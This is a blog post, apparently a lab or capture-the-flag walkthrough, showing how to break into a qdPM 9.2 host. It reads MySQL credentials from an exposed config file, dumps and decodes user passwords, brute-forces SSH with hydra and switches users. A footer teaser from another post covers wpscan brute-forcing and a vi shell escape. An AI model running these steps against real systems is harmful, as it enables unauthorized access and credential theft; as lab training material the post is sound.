sql misconfiguration and privesc with path vulnerbility

 

  • sql misconfiguration and privesc with path vulnerability

1 nmap 10.10.134.21 -sV

. -sV = Probe open ports to determine service/version info.






2 search ip in browser to show admin page.














. qdPM 9.2 = show website version.

3 check version is exploitable or not.

















. version is exploitable.

. check last line in exploit this link to install yml file link = http://<website>/core/config/databases.yml

4 Download yml file to see username name and password for mysql databse.





5 chek yml file.











6 enter mysql dabatse use username and password.

# mysql -h 10.10.134.21 -u qdpmadmin -p

. -h = host

. -u = username.

. -p = password











7 show mysql databses.

# show databases;








. to show all dabatbase in mysql.

8 go staff database and show tables.

# use staff

# show tables;









. this colum to informatin about staff informatin

9 show user table data to information about usernames.

# select * from user;

. * = selcet all data.





. To show all users.

. and copy all user and make list for users.

EX:- nano user.txt

. nano = this is a file editor in linux to make and modify files.

10 show password in this user.

# select * from login;








. to show all password but password in based64 encrypted.

11 how to decrypt password

. cyberchef = this is a website to decrypt the password.











. and decrypt all password after that make list of decrypt password.

# nano lo.txt

. to paste all password.

12 burte force usernmae and login password with help of hydra tool.

# hydra -L [user name list] -P [password list] 10.10.134.21 ssh

. -L = enter user list.

. -P = enter passwords list.

ssh = service name














. I found 2 username and password.

13 login ssh with travis username.

ssh travis@10.10.134.21











14 login second user.

# su dexter

. su = this is a linux command to switch user.











NOTE:- please secure your domain before another black hat hacker to find this vulnerability and access your system use for illegal purpose and damage your system for more information to contect me anytime.

NMAE = Rachit

CONTECT NO. = 8810xxxxxx

THANKS.

Comments

Post a Comment

Popular posts from this blog

BUG REPORT

Image
  BUG REPORT . # = means commands . 1-6 = show my steps 1 netdiscover. # netdiscover -r [192.168.159.133] . netdiscover = find network traffic ips and mac address. . -r = range: scan a given range instead of auto scan. 192.168.6.0/24,/16,/8 2 nmap # nmap -p- [192.168.159.133] -sV . -p- = bydefault all ports scan tcp ex: 65535 . -sV = Probe open ports to determine service/version info 3 wpscan. # wpscan --url http://dc-2/ -e . --url = target url scan . -e = enumerate ex: username. #wpscan --url http://dc-2/ -U /home/kali/usr -P /home/kali/pass.txt . -U = usernames LIST . -P password LIST 3 aceess. # ssh tom@192.168.159.133 -p 7744 . access the tom users on port 7744. 4 change shell for this machine for the root access # vi flag3.txt and :set shell=/bin/bash after that call the shell 5 To run all linux commands LIKE:- cat , cd , su , sudo etc. # export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:$P
Read more